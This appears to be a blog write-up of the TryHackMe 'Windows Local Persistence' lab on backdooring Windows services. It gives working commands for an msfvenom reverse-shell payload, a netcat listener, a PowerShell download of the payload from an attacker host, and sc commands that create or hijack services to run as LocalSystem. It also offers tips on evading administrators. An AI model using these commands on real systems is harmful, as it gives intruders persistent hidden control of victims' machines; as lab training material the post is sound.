In this post, We covered the third part of Windows Persistence Techniques and specifically we covered Backdooring Windows Services as part of TryHackMe Windows Local Persistence.
Windows services offer a great way to establish persistence since they can be configured to run in the background whenever the victim machine is started. If we can leverage any service to run something for us, we can regain control of the victim machine each time it is started.
A service is basically an executable that runs in the background. When configuring a service, you define which executable will be used and select if the service will automatically run when the machine starts or should be manually started.
There are two main ways we can abuse services to establish persistence
- Create a new service
- Modify an existing one to execute our payload.
Method 1: Creating a Backdoor Service
My first approach is to create a new service that runs a malicious payload. I’ll use a tool called msfvenom to generate a payload, which is an executable file that will give me a reverse shell. Then, I’ll create a new service and configure it to run this payload automatically on startup.
The downside to this method is that a new, unfamiliar service might look suspicious to a system administrator or anyone investigating a potential security breach.
Method 2: Backdooring an Existing Service
My second method is a bit stealthier. Instead of creating a new service, I’ll modify an existing, legitimate one. I’ll change the service’s “binary path” to point to my malicious payload instead of its original executable. I’ll also set the service to start automatically and change its start name to run as LocalSystem
to ensure it has full administrative privileges. This way, my backdoor is hidden within a service that’s expected to be running on the system.
Technical Commands
Here are the commands I used in the terminal throughout the video:
Creating a new service:
sc executable create thm service binpath=C:\Users\IEUser\Desktop\payload.exe start=auto
sc start thm service 2
Creating a payload with msfvenom
:
sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload.exe
sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload_v2.exe
Setting up a Netcat listener:
nc -lvp 4545
Downloading a payload with PowerShell:
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload.exe','C:\Users\IEUser\Desktop\payload.exe')"
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload_v2.exe','C:\Users\IEUser\Desktop\payload_v2.exe')"
Enumerating services:
sc query state= all
sc query thm service 3
sc qc thm service 3
Reconfiguring an existing service:
sc config thm service 3 binpath=C:\Users\IEUser\Desktop\payload_v2.exe start=auto obj=LocalSystem
sc start thm service 3
TryHackMe Windows Local Persistence Room Answers
Insert flag8 here
Very useful information thanks